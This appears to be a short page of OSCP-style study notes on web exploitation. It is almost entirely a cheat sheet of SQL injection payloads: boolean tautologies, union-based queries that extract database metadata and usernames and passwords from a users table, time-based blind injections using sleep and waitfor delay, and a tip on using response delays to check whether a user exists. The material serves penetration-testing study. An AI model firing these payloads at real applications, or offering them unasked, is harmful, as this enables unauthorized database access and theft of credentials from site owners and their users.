// notes/ Web Exploitation
🕸️
SQL Injection Payloads
Notes from oscp.adot8.com — web applications.
#web applications#adot8
source · oscp.adot8.com · web-applications/sql-injection_payloads ↗Payloads
code
01or 1=1 02or 1=1-- -03or 1=1-- - //04or 1=1#05or 1=1/06' or 1=107' or 1=1-- - 08' or 1=1#09' or 1=1/10' or 1=1-- - //11' or 1=1 in (select @@version)-- - //12' or 1=1 in (select * from users)-- -//13' or 1=1 in (select passwords from users)-- -//14' or 1=1 in (select password from users where username = 'admin') -- //Union based
<pre><code>' order by 1-- - ' order by 1-- // <strong>' union select database(), user(), @@version, null, null -- // <-- 5 columns </strong>' union select null, table_name, column_name, table_schema, null from information_schema.columns where table_schema=database() -- // ' union select null, username, password, description, null from users -- // </code></pre>Blind SQLi
code
011 or sleep(5)#021 or sleep 5-- - 031 or sleep 5--041 or sleep (5-)-05' or sleep(5)-- -06" or sleep(5)="07' or sleep(5)='08'waitfor delay '0:0:5'--09;waitfor delay '0:0:5'--10';waitfor delay '0:0:5'--11' AND IF (1=1, sleep(3), 'false') -- -12' AND IF (1=1, sleep(3), 'false') -- //{% hint style="info" %} If the query is looking a specific user we can append the payload and if it hangs for 3 seconds that means that the user exists
adot8' AND IF (1=1, sleep(3), 'false') -- -
{% endhint %}
Terminators
code
01-- -